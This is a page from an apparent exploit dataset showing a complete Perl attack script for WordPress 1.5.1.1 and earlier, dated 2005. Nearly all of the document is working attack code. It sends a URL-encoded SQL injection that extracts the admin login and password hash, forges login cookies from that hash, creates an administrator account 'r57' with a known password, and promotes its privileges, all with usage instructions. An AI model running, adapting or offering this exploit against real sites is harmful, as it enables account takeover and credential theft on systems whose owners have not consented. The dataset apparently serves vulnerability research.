Team Ai
Modelpublic

lilbool/vuln-code-analysis

sourceHugging Facemitupdated 2y agoView on Hugging Face
0likes
exploit_1059.txt112 linesDownload Raw Back to exploits
1#!/usr/bin/perl

2

3## WordPress <= 1.5.1.1 sql injection "add new admin" exploit

4## by RST/GHC , http://rst.void.ru , http://ghc.ru

5## coded by 1dt.w0lf

6

7use LWP::UserAgent;

8use Getopt::Std;

9use HTTP::Cookies;

10use Digest::MD5 qw(md5_hex);

11getopts('h:p:');

12

13$path = $opt_h;

14$pref = $opt_p || 'wp_';

15

16if(!$path) { usage(); }

17

18$xpl = LWP::UserAgent->new() or die;

19&header();

20print " +---[x] STEP 1 - TRY GET ADMIN INFO\n";

21$reg  = $path;

22$reg .= '?%63%61%74=%36%36%36%20%75%6E%69%6F%6E%20%73%65%6C%65%63%74%20%36%36%36%2C%63%6F%6E'.

23        '%63%61%74%28%63%68%61%72%28%35%38%2C%35%38%2C%35%38%29%2C%75%73%65%72%5F%6C%6F%67%69'.

24        '%6E%2C%63%68%61%72%28%35%38%2C%35%38%2C%35%38%29%2C%75%73%65%72%5F%70%61%73%73%2C%63'.

25        '%68%61%72%28%35%38%2C%35%38%2C%35%38%29%29%2C%6E%75%6C%6C%2C%6E%75%6C%6C%2C%6E%75%6C'.

26        '%6C%20%66%72%6F%6D%20'.$pref.'%75%73%65%72%73%20%57%48%45%52%45%20%49%44=1'; ### 1 - admin ID

27$res = $xpl->get($reg);

28die "ERROR : ", $res->status_line unless $res->is_success;

29if($res->content =~ m/(?::::)(.*)(?::::)([a-f0-9]{32})(?::::)(<\/title>)/) 

30  { 

31  $login = $1; $hash = $2; 

32  print "\n>> LOGIN : $login\n>>  HASH : $hash\n\n";

33  }

34else { print "ERROR : Forum not vulnerable or bad prefix."; exit(); }

35

36$cookie_jar = HTTP::Cookies->new();

37($cpath = $path) =~ s!/$!!;

38$hash  = md5_hex($hash);

39($host   = $cpath) =~ s!http://([^/]*).*!$1!;

40$cpath = md5_hex($cpath);

41

42$xpl->cookie_jar( $cookie_jar );

43

44$cookie_jar->set_cookie( "0","wordpresspass_$cpath","$hash","/",$host,,,,,);

45$cookie_jar->set_cookie( "1","wordpressuser_$cpath","$login","/",$host,,,,,);

46print " +---[x] STEP 2 - CREATE NEW USER\n";

47$reg  = $path;

48$reg .= 'wp-admin/users.php';

49$res = $xpl->post("$reg",

50{

51 "action"     => "adduser",

52 "user_login" => "r57",

53 "firstname"  => "RST",

54 "lastname"   => "GHC",

55 "email"      => "billy\@microsoft.com",

56 "uri"        => "http://rst.void.ru",

57 "pass1"      => "r57",

58 "pass2"      => "r57",

59 "adduser"    => "Submit",

60},

61Referer => $reg

62);

63print " +---[x] STEP 3 - GET ID OF NEW USER\n";

64$reg  = $path;

65$reg .= 'wp-admin/users.php';

66$res = $xpl->get("$reg",Referer => $reg);

67@res = split(/\n/,$res->content);

68$id = 0;

69for(@res)

70 {

71  if(/(?:\<td align=\'center\'\>)([0-9]*)(?:\<\/td\>)/) { $id = $1; }

72  if(/\<td\>\<strong\>r57\<\/strong\>\<\/td\>/) { last; }

73 }

74die "ERROR : ", $res->status_line unless $res->is_success;

75if($id != 0) { print "\n>> ID : $id\n\n"; }

76else { print "[-] ERROR : CAN'T GET NEW USER ID\n"; exit(); }

77print " +---[x] STEP 4 - LEVEL UP FOR NEW USER\n\n";

78$reg  = $path;

79$reg .= 'wp-admin/users.php?action=promote&id='.$id.'&prom=up';

80for($i=0;$i<10;$i++)

81{

82print ">> LEVEL UP # $i\n";

83$res = $xpl->get("$reg",Referer => $reg);

84die "ERROR : ", $res->status_line unless $res->is_success;

85}

86print "\nTHATS ALL. NOW YOU CAN LOGIN WITH USERNAME 'r57' AND PASSWORD 'r57'\n";

87

88sub usage()

89{

90 &header();

91 print "USAGE : r57wp.pl [OPTIONS]\n";

92 print "\noptions:\n\n";

93 print "-h [path]\n";

94 print "	Path to wordpress installed\n";

95 print "-p [prefix] (optional)\n";

96 print "	Database tables prefix (default 'wp_')\n\n";

97 print "e.g.: r57wp.pl -h http://blah.com/wordpress/\n";

98 print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";

99 print "(c)oded by 1dt.w0lf\n";

100 print "RST/GHC\n";

101 print "http://ghc.ru\n";

102 print "http://rst.void.ru\n";

103 exit();

104}

105sub header()

106{

107 print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";

108 print "                 WordPress 1.5.1.1 exploit                 \n";

109 print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";

110}

111

112# milw0rm.com [2005-06-21]